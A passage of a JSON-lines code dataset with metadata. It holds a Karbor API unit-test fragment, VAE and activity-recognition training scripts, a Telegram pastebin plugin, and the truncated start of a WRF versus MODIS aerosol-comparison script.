provider_id=DEFAULT_PROVIDER_ID,\n status=constants.PLAN_STATUS_STARTED,\n project_id=DEFAULT_PROJECT_ID,\n resources=DEFAULT_RESOURCES)\n body = {\"plan\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n mock_plan_get.return_value = plan\n self.assertRaises(exception.InvalidPlan,\n self.controller.update, req,\n \"2a9ce1f3-cc1a-4516-9435-0ebb13caa398\",\n body)\n\n def _plan_in_request_body(self, name=DEFAULT_NAME,\n description=DEFAULT_DESCRIPTION,\n provider_id=DEFAULT_PROVIDER_ID,\n status=constants.PLAN_STATUS_SUSPENDED,\n project_id=DEFAULT_PROJECT_ID,\n resources=DEFAULT_RESOURCES,\n parameters=DEFAULT_PARAMETERS):\n plan_req = {\n 'name': name,\n 'description': description,\n 'provider_id': provider_id,\n 'status': status,\n 'project_id': project_id,\n 'resources': resources,\n 'parameters': parameters,\n }\n\n return plan_req\n", "sub_path": "karbor/tests/unit/api/v1/test_plans.py", "file_name": "test_plans.py", "file_ext": "py", "file_size_in_byte": 9756, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "oslo_config.cfg.CONF", "line_number": 25, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 25, "usage_type": "name"}, {"api_name": "karbor.tests.base.TestCase", "line_number": 36, "usage_type": "attribute"}, {"api_name": "karbor.tests.base", "line_number": 36, "usage_type": "name"}, {"api_name": "karbor.api.v1.plans.PlansController", "line_number": 39, "usage_type": "call"}, {"api_name": "karbor.api.v1.plans", "line_number": 39, "usage_type": "name"}, {"api_name": "karbor.context.RequestContext", "line_number": 40, "usage_type": "call"}, {"api_name": "karbor.context", "line_number": 40, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 49, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 49, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 49, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.PROVIDER_OS", "line_number": 50, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 50, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 42, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 44, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 57, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 57, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 57, "usage_type": "name"}, {"api_name": "webob.exc.HTTPUnprocessableEntity", "line_number": 58, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 58, "usage_type": "name"}, {"api_name": "karbor.common.constants.PLAN_STATUS_SUSPENDED", "line_number": 66, "usage_type": "attribute"}, {"api_name": "karbor.common.constants", "line_number": 66, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 70, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 70, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 70, "usage_type": "name"}, {"api_name": "karbor.exception.InvalidInput", "line_number": 71, "usage_type": "attribute"}, {"api_name": "karbor.exception", "line_number": 71, "usage_type": "name"}, {"api_name": "karbor.common.constants.PLAN_STATUS_SUSPENDED", "line_number": 79, "usage_type": "attribute"}, {"api_name": "karbor.common.constants", "line_number": 79, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 83, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 83, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 83, "usage_type": "name"}, {"api_name": "karbor.exception.InvalidInput", "line_number": 84, "usage_type": "attribute"}, {"api_name": "karbor.exception", "line_number": 84, "usage_type": "name"}, {"api_name": "karbor.common.constants.PLAN_STATUS_SUSPENDED", "line_number": 95, "usage_type": "attribute"}, {"api_name": "karbor.common.constants", "line_number": 95, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.PROVIDER_OS", "line_number": 99, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 99, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 100, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 100, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 100, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 101, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 101, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 87, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 111, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 111, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 111, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 104, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 106, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 120, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 120, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 120, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 122, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 122, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 128, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 128, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 128, "usage_type": "name"}, {"api_name": "webob.exc.HTTPNotFound", "line_number": 130, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 130, "usage_type": "name"}, {"api_name": "karbor.common.constants.PLAN_STATUS_SUSPENDED", "line_number": 138, "usage_type": "attribute"}, {"api_name": "karbor.common.constants", "line_number": 138, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 142, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 142, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 142, "usage_type": "name"}, {"api_name": "karbor.exception.InvalidInput", "line_number": 144, "usage_type": "attribute"}, {"api_name": "karbor.exception", "line_number": 144, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 150, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 150, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 150, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 147, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 157, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 157, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 157, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 161, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 161, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 161, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 162, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 162, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 166, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 166, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 166, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 167, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 167, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 172, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 172, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 172, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 173, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 173, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 154, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 180, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 180, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 180, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 186, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 186, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 186, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 183, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 191, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 191, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 191, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 193, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 193, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 199, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 199, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 199, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 196, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 204, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 204, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 204, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 206, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 206, "usage_type": "name"}, {"api_name": "karbor.common.constants.PLAN_STATUS_STARTED", "line_number": 219, "usage_type": "attribute"}, {"api_name": "karbor.common.constants", "line_number": 219, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 223, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 223, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 223, "usage_type": "name"}, {"api_name": "karbor.exception.InvalidPlan", "line_number": 225, "usage_type": "attribute"}, {"api_name": "karbor.exception", "line_number": 225, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 209, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 211, "usage_type": "call"}, {"api_name": "karbor.common.constants.PLAN_STATUS_SUSPENDED", "line_number": 233, "usage_type": "attribute"}, {"api_name": "karbor.common.constants", "line_number": 233, "usage_type": "name"}]} +{"seq_id": "252403865", "text": "from argparse import ArgumentParser\n\nimport pytorch_lightning as pl\nfrom pytorch_lightning import loggers as pl_loggers\n\nfrom models import VAE, IWAE, AMCVAE, LMCVAE, VAE_with_flows\nfrom utils import make_dataloaders, get_activations, str2bool\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser = pl.Trainer.add_argparse_args(parser)\n tb_logger = pl_loggers.TensorBoardLogger('lightning_logs/')\n\n parser.add_argument(\"--model\", default=\"VAE\",\n choices=[\"VAE\", \"IWAE\", \"AMCVAE\", \"LMCVAE\", \"VAE_with_flows\"])\n\n ## Dataset params\n parser.add_argument(\"--dataset\", default='mnist', choices=['mnist', 'fashionmnist', 'cifar', 'omniglot', 'celeba'])\n parser.add_argument(\"--binarize\", type=str2bool, default=False)\n ## Training parameters\n parser.add_argument(\"--batch_size\", default=32, type=int)\n parser.add_argument(\"--val_batch_size\", default=50, type=int)\n parser.add_argument(\"--grad_skip_val\", type=float, default=0.)\n parser.add_argument(\"--grad_clip_val\", type=float, default=0.)\n\n ## Architecture\n parser.add_argument(\"--hidden_dim\", default=64, type=int)\n parser.add_argument(\"--num_samples\", default=1, type=int)\n parser.add_argument(\"--act_func\", default=\"gelu\",\n choices=[\"relu\", \"leakyrelu\", \"tanh\", \"logsigmoid\", \"logsoftmax\", \"softplus\", \"gelu\"])\n parser.add_argument(\"--net_type\", choices=[\"fc\", \"conv\"], type=str, default=\"conv\")\n\n ## Specific parameters\n parser.add_argument(\"--K\", type=int, default=3)\n parser.add_argument(\"--n_leapfrogs\", type=int, default=3)\n parser.add_argument(\"--step_size\", type=float, default=0.01)\n\n parser.add_argument(\"--use_barker\", type=str2bool, default=False)\n parser.add_argument(\"--use_score_matching\", type=str2bool, default=False) # for ULA\n parser.add_argument(\"--use_cloned_decoder\", type=str2bool,\n default=False) # for AIS VAE (to make grad throught alphas easier)\n parser.add_argument(\"--learnable_transitions\", type=str2bool,\n default=False) # for AIS VAE and ULA (if learn stepsize or not)\n parser.add_argument(\"--variance_sensitive_step\", type=str2bool,\n default=False) # for AIS VAE and ULA (adapt stepsize based on dim's variance)\n parser.add_argument(\"--use_alpha_annealing\", type=str2bool,\n default=False) # for AIS VAE, True if we want anneal sum_log_alphas during training\n parser.add_argument(\"--annealing_scheme\", type=str,\n default='linear') # for AIS VAE and ULA VAE, strategy to do annealing\n parser.add_argument(\"--specific_likelihood\", type=str,\n default=None) # specific likelihood\n\n parser.add_argument(\"--ula_skip_threshold\", type=float,\n default=0.0) # Probability threshold, if below -- skip transition\n parser.add_argument(\"--acceptance_rate_target\", type=float,\n default=0.95) # Target acceptance rate\n parser.add_argument(\"--sigma\", type=float, default=1.)\n\n parser.add_argument(\"--num_flows\", type=int, default=1)\n\n act_func = get_activations()\n\n args = parser.parse_args()\n print(args)\n\n kwargs = {'num_workers': 20, 'pin_memory': True}\n train_loader, val_loader = make_dataloaders(dataset=args.dataset,\n batch_size=args.batch_size,\n val_batch_size=args.val_batch_size,\n binarize=args.binarize,\n **kwargs)\n image_shape = train_loader.dataset.shape_size\n if args.model == \"VAE\":\n model = VAE(shape=image_shape, act_func=act_func[args.act_func],\n num_samples=args.num_samples, hidden_dim=args.hidden_dim,\n net_type=args.net_type, dataset=args.dataset, specific_likelihood=args.specific_likelihood,\n sigma=args.sigma)\n elif args.model == \"IWAE\":\n model = IWAE(shape=image_shape, act_func=act_func[args.act_func], num_samples=args.num_samples,\n hidden_dim=args.hidden_dim,\n name=args.model, net_type=args.net_type, dataset=args.dataset,\n specific_likelihood=args.specific_likelihood, sigma=args.sigma)\n elif args.model == \"VAE_with_flows\":\n model = VAE_with_flows(shape=image_shape, act_func=act_func[args.act_func], num_samples=args.num_samples,\n hidden_dim=args.hidden_dim, name=args.model, flow_type=\"RealNVP\",\n num_flows=args.num_flows,\n net_type=args.net_type, dataset=args.dataset,\n specific_likelihood=args.specific_likelihood,\n sigma=args.sigma)\n elif args.model == 'AMCVAE':\n model = AMCVAE(shape=image_shape, step_size=args.step_size, K=args.K, use_barker=args.use_barker,\n num_samples=args.num_samples, acceptance_rate_target=args.acceptance_rate_target,\n dataset=args.dataset, net_type=args.net_type, act_func=act_func[args.act_func],\n hidden_dim=args.hidden_dim, name=args.model, grad_skip_val=args.grad_skip_val,\n grad_clip_val=args.grad_clip_val,\n use_cloned_decoder=args.use_cloned_decoder, learnable_transitions=args.learnable_transitions,\n variance_sensitive_step=args.variance_sensitive_step,\n use_alpha_annealing=args.use_alpha_annealing, annealing_scheme=args.annealing_scheme,\n specific_likelihood=args.specific_likelihood, sigma=args.sigma)\n elif args.model == 'LMCVAE':\n model = LMCVAE(shape=image_shape, step_size=args.step_size, K=args.K,\n num_samples=args.num_samples, acceptance_rate_target=args.acceptance_rate_target,\n dataset=args.dataset, net_type=args.net_type, act_func=act_func[args.act_func],\n hidden_dim=args.hidden_dim, name=args.model, grad_skip_val=args.grad_skip_val,\n grad_clip_val=args.grad_clip_val, use_score_matching=args.use_score_matching,\n use_cloned_decoder=args.use_cloned_decoder, learnable_transitions=args.learnable_transitions,\n variance_sensitive_step=args.variance_sensitive_step,\n ula_skip_threshold=args.ula_skip_threshold, annealing_scheme=args.annealing_scheme,\n specific_likelihood=args.specific_likelihood, sigma=args.sigma)\n else:\n raise ValueError\n\n args.gradient_clip_val = args.grad_clip_val\n automatic_optimization = (args.grad_skip_val == 0.) and (args.gradient_clip_val == 0.)\n\n trainer = pl.Trainer.from_argparse_args(args, logger=tb_logger, fast_dev_run=False,\n terminate_on_nan=automatic_optimization,\n automatic_optimization=automatic_optimization)\n pl.Trainer()\n trainer.fit(model, train_dataloader=train_loader, val_dataloaders=val_loader)\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7229, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer.add_argparse_args", "line_number": 11, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.loggers.TensorBoardLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers", "line_number": 12, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 19, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 38, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 39, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 40, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 42, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 44, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 46, "usage_type": "name"}, {"api_name": "utils.get_activations", "line_number": 61, "usage_type": "call"}, {"api_name": "utils.make_dataloaders", "line_number": 67, "usage_type": "call"}, {"api_name": "models.VAE", "line_number": 74, "usage_type": "call"}, {"api_name": "models.IWAE", "line_number": 79, "usage_type": "call"}, {"api_name": "models.VAE_with_flows", "line_number": 84, "usage_type": "call"}, {"api_name": "models.AMCVAE", "line_number": 91, "usage_type": "call"}, {"api_name": "models.LMCVAE", "line_number": 101, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer.from_argparse_args", "line_number": 116, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 116, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "595026039", "text": "from pyrogram import Client, filters\nfrom pyrogram.types import Message\n\nfrom config import prefix\nfrom consts import http\n\n\n@Client.on_message(filters.command(\"paste\", prefix))\nasync def dogbin(c: Client, m: Message):\n if m.reply_to_message:\n if m.reply_to_message.document:\n tfile = m.reply_to_message\n to_file = await tfile.download()\n with open(to_file, 'rb') as fd:\n mean = fd.read().decode('UTF-8')\n if m.reply_to_message.text:\n mean = m.reply_to_message.text\n\n url = \"https://del.dog/documents\"\n r = await http.post(url, data=mean.encode('UTF-8'))\n url = f\"https://del.dog/{r.json()['key']}\"\n await m.reply_text(url, disable_web_page_preview=True)\n else:\n await m.reply_text(\"Please Reply to text or document.\")\n", "sub_path": "plugins/dogbin.py", "file_name": "dogbin.py", "file_ext": "py", "file_size_in_byte": 833, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pyrogram.Client", "line_number": 9, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 9, "usage_type": "name"}, {"api_name": "consts.http.post", "line_number": 20, "usage_type": "call"}, {"api_name": "consts.http", "line_number": 20, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 8, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 8, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 8, "usage_type": "call"}, {"api_name": "config.prefix", "line_number": 8, "usage_type": "argument"}, {"api_name": "pyrogram.filters", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "105229644", "text": "import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom src.utils.file_io import get_user_splits, get_activity_names, get_stats\nfrom src.dataloader.torch_dataloader import CustomDataLoader\nfrom src.models.ffnn import Net\nfrom src.train.trainloop import TrainLoop\n\n'''\nFit the model to preprocessed sensor data with window = 50, stride = 25, basic statistical features \n'''\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cpu\")\n# device = torch.device(\"cuda:0\" if use_cuda else \"cpu\")\n\nbatch_size = 256\nn_layers = 3\nn_units = (512, 1024, 512)\nlr = 0.001\nmomentum = 0.9\nmax_epochs = 20\nwriter = SummaryWriter(\"experiments/tensorboard/experiment_4\")\n\nactivity_names = get_activity_names()\ntrain_users, val_users, test_users = get_user_splits()\n# Mean, Std = get_stats(train_users)\n# print(\"Means: \", list(Mean), \"Std Devs: \", list(Std))\n# print(len(train_users), len(val_users), len(test_users))\n\ntrain_dataset = CustomDataLoader(train_users)\nval_dataset = CustomDataLoader(val_users)\ntest_dataset = CustomDataLoader(test_users)\n\ntorch.save(train_dataset, './data/preprocessed/train_dataset_experiment4.pt')\ntorch.save(val_dataset, './data/preprocessed/val_dataset_experiment4.pt')\ntorch.save(test_dataset, './data/preprocessed/test_dataset_experiment4.pt')\n\n# train_dataset = torch.load('./data/preprocessed/train_dataset.pt', map_location=device)\n# val_dataset = torch.load('./data/preprocessed/val_dataset.pt', map_location=device)\n# test_dataset = torch.load('./data/preprocessed/test_dataset.pt', map_location=device)\n\nsample = train_dataset[1]\ntrainloader = CustomDataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=4)\nvalloader = CustomDataLoader(val_dataset, batch_size=batch_size, shuffle=True, num_workers=0)\n\nnet = Net(sample['x'].shape[0], 12, n_layers=n_layers, n_units=n_units)\nnet.to(device)\nloss_fn = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=lr, momentum=momentum)\n\nprint_every = int(len(train_dataset)/(10 * batch_size))\ntrain = TrainLoop(net, trainloader, optimizer, loss_fn, device, writer, val_loader=valloader, print_every=print_every)\ntrain.fit(max_epochs)\n", "sub_path": "experiments/experiment4.py", "file_name": "experiment4.py", "file_ext": "py", "file_size_in_byte": 2237, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "torch.cuda.is_available", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 24, "usage_type": "call"}, {"api_name": "src.utils.file_io.get_activity_names", "line_number": 26, "usage_type": "call"}, {"api_name": "src.utils.file_io.get_user_splits", "line_number": 27, "usage_type": "call"}, {"api_name": "src.dataloader.torch_dataloader.CustomDataLoader", "line_number": 32, "usage_type": "call"}, {"api_name": "src.dataloader.torch_dataloader.CustomDataLoader", "line_number": 33, "usage_type": "call"}, {"api_name": "src.dataloader.torch_dataloader.CustomDataLoader", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 38, "usage_type": "call"}, {"api_name": "src.dataloader.torch_dataloader.CustomDataLoader", "line_number": 45, "usage_type": "call"}, {"api_name": "src.dataloader.torch_dataloader.CustomDataLoader", "line_number": 46, "usage_type": "call"}, {"api_name": "src.models.ffnn.Net", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 51, "usage_type": "name"}, {"api_name": "src.train.trainloop.TrainLoop", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "211881992", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 14 14:28:00 2021\n\n@author: noelia\n\"\"\"\n\nimport glob\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\nfrom matplotlib.colors import BoundaryNorm\nimport matplotlib.cm as cm\nfrom matplotlib.ticker import MaxNLocator\nimport xarray as xr\nimport pandas as pd\nimport basemap_modis as basemod\n\ndire_mod = \"../DATA/SP/regridded_2017/\"\ndire_wrf = '../DATA/'\n\noutput = \"../results/plot_wrf_modis/\"\n########################### READ WRF IMAGES ###############################\nds_disk = xr.open_dataset(dire_wrf+\"june_aod.avg.column.550_p1.nc\")\naod_wrf = ds_disk[\"aod_055\"].values\nlon = ds_disk.XLONG.values\nlat = ds_disk.XLAT.values\ntimes = pd.DataFrame({'date': ds_disk.Time.values})\ntimes['date_local'] = times['date'].dt.tz_localize('UTC').dt.tz_convert('America/Sao_Paulo')\ntimes['date_qualar'] = times['date_local'].dt.strftime('%Y-%m-%d %H:%M:%S')\ntime_wrf = []\nfor ll in str(times['date_qualar'].tolist()).split(\",\"):\n time_wrf.append(ll[2:15])\n\nserie_time = pd.DataFrame(pd.date_range(start='2017-06-01', end='2017-06-16'), columns=[\"Date\"]) \nserie_time[\"Date\"] = serie_time[\"Date\"].dt.strftime('%Y-%m-%d') \n################### eliminando los dias repetidos ###############################\nmj3 = []\nmj2 = [] ### almacenando solo los datos aod de los dias no repetidos\nfor i in range(len(time_wrf)):\n if i == (len(time_wrf)-1):\n break;\n else:\n if time_wrf[i] == time_wrf[i+1]:\n pass;\n else:\n mj3.append(time_wrf[i]) \n mj2.append(aod_wrf[i])\n if i == (len(time_wrf)-2):\n if time_wrf[i] == time_wrf[i+1]:\n mj3.append(time_wrf[len(time_wrf)-1])\n mj2.append(aod_wrf[len(time_wrf)-1])\n else:\n pass;\n########################### READ MODIS IMAGES #############################\nmylist=[]\nlistdirr = []\nfiles1 = sorted(glob.glob(dire_mod+\"*_regrid.nc\")) ## archivos wrfout\nfor i in range(len(files1)):\n if i == (len(files1)-1):\n break; \n else:\n if files1[i][-50:-33] == files1[i+1][-50:-33]: #### para la misma hora\n listdirr.append(files1[i]) \n if i == (len(files1)-2):\n listdirr.append(files1[len(files1)-1])\n mylist.append(listdirr) \n else:\n listdirr.append(files1[i])\n mylist.append(listdirr)\n listdirr = []\n\n##### Realizando un mosaico para los datos MODIS para la misma hora\naod_mod_total = np.zeros((len(mylist),aod_wrf.shape[1],aod_wrf.shape[2])) \ntime_mod_total = []\nfor n in range(len(mylist)):\n if len(mylist[n]) != 1: #### cuando hay mas de 1 dato para la misma hora\n m=[]\n for FILE_NAME in mylist[n]:\n df = xr.open_dataarray(FILE_NAME)\n times_mod = df.attrs[\"time\"] \n aod_mod = df.values\n m.append(aod_mod)\n aod_mod_total[n] = np.nansum(np.dstack(m),2) ### mosaico \n time_mod_total.append(times_mod)\n else:\n for FILE_NAME in mylist[n]:\n df = xr.open_dataarray(FILE_NAME)\n times_mod = df.attrs[\"time\"] \n aod_mod_total[n] = df.values\n time_mod_total.append(times_mod)\n \n######## comparando tiempo del modelo y de las imagenes satelitales ###########\naod_mod_total[aod_mod_total==0]=np.nan\nlist_aod_mod = []; list_aod_wrf = []; time_wrf_total = []\nfor i in range(len(time_mod_total)):\n for j in range(len(mj3)):\n if str(time_mod_total[i][0:13]) == str(mj3[j]): ##### seleccion de tiempo\n time_wrf_total.append(mj3[j])\n for a in range(lon.shape[0]):\n for b in range(lat.shape[1]):\n if str(aod_mod_total[i,a,b]) == str(np.nan):\n mj2[j][a,b] = np.nan\n list_aod_mod.append(aod_mod_total[i])\n list_aod_wrf.append(mj2[j])\n \n########################### TERRA Y AQUA ###################################### \ndat_wrf_t_day = [];dat_wrf_a_day = [];dat_mod_t_day = [];dat_mod_a_day = []\nfor n in range(len(serie_time)):\n day_wrf_t = [];day_wrf_a = [];day_mod_t = [];day_mod_a = [] \n for o in range(len(time_mod_total)):\n ######################## media por dia ################################\n if str(serie_time[\"Date\"][n]) == str(time_mod_total[o][0:10]):\n if int(time_mod_total[o][11:13]) < 12: #### Terra\n day_mod_t.append(list_aod_mod[o])\n day_wrf_t.append(list_aod_wrf[o])\n else:\n day_mod_a.append(list_aod_mod[o]) #### Aqua\n day_wrf_a.append(list_aod_wrf[o])\n if len(day_mod_t) != 0:\n dat_mod_t_day.append(np.nanmean(day_mod_t,axis=0))\n dat_wrf_t_day.append(np.nanmean(day_wrf_t,axis=0))\n else:\n dat_mod_t_day.append(np.nan)\n dat_wrf_t_day.append(np.nan)\n if len(day_mod_a) != 0:\n dat_mod_a_day.append(np.nanmean(day_mod_a,axis=0))\n dat_wrf_a_day.append(np.nanmean(day_wrf_a,axis=0))\n else:\n dat_mod_a_day.append(np.nan)\n dat_wrf_a_day.append(np.nan)\n ################# day ###############################\n 